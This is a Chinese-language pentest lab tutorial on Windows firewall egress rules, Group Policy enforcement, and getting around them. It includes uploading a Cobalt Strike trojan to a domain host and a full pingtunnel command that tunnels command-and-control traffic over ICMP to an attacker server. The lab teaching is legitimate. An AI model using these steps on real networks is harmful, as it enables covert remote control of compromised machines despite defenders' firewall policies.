一.单机-防火墙-限制端口出入站-熟悉常见主机配置不出网的方式

配置防火墙属性

1.win10虚拟机本地搭建一个网站，配置防火墙属性的入站连接为默认值。

局域网中另一台主机能正常访问

2.入站连接设置为 阻止所有连接 。

因为是我们去访问他的网站，所以是入站。

无法在访问成功

配置出入站规则

正向连接&反向连接

reverse监听 反向：上传的后门会主动连接我们控制的服务器   对于目标防火墙中属于出站规则

bind监听 正向：我们控制的服务器主动去连接目标服务器   对于目标防火墙中属于入站规则

1.cs生成exe木马

上传到win10虚拟机，能正常上线

2.因为使用的是reverse监听器方式，所以是出站，使用的是9527端口。在win10虚拟机配置出站规则

新建规则——直接禁止了9527端口的连接

再次执行cs木马程序，程序无法执行，cs无法上线

二.单机-防火墙-限制协议出入站-熟悉常见主机配置不出网的方式

配置协议

新建规则——将规则应用于tcp协议和所有端口

配置完成后，不管cs或者msf更换任何端口都无法在上线

三.域控-防火墙-组策略对象同步-熟悉常见主机配置不出网的操作流程

1.查看一台域内主机的防火墙状态，域和专用网络是开启状态，公用网络关闭状态

2.登录域控制器，操作：开始-管理工具-组策略管理-域-创建GPO链接

创建名称为 fhq

3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性

4.我们配置为：域——启用    专用和公用——关闭

5.限制协议：在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字：TCP协议控制

6.如何让域控制器的配置在域成员主机生效？

生效策略：强制&命令&重启

命令：

来到域内主机，命令行执行命令：gpupdate/force

再次查看防火墙状态，发现变成了域控制器上的配置

强制：强制生效

回到组策略管理——fhq右键——强制

来到出站规则，可以看到TCP协议控制同样生效

配置完成后，ping www.baidu.com 能ping通，网络没问题。但是浏览器访问不了，就是因为禁用了TCP协议。ping走的是ICMP协议。

 

 

 

四.隧道技术

如果目标主机的出站规则中TCP协议被封杀，入站规则没有封杀，有互联网网络。该怎么上线？

1.正向连接：取得一台有网络能和目标主机通讯的服务器权限

2.隧道技术：走其他协议出网即可

 

隧道技术

前提：已获取一台域用户主机的管理员权限

1.本机启动cs，新建两个监听器，分别为127.0.0.1:5555和本机ipv4地址:6666

2.生成exe程序木马

3.启动pingtunnel工具

下载:https://github.com/esrrhs/pingtunnel

4.将exe程序木马和pingtunnel.exe工具上传到域用户主机

使用管理员用户启动命令行，执行如下：

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.172.249 -t 192.168.172.249:6666 -tcp 1 -noprint 1 -nolog 1

5.运行exe木马，cs成功上线

 

如果目标主机没有互联网网络怎么办？

正向连接：取得一台有网络能和目标主机通讯的服务器权限。将服务器当做跳板，把数据给出网的服务器，通过出网服务器正向连接控制目标主机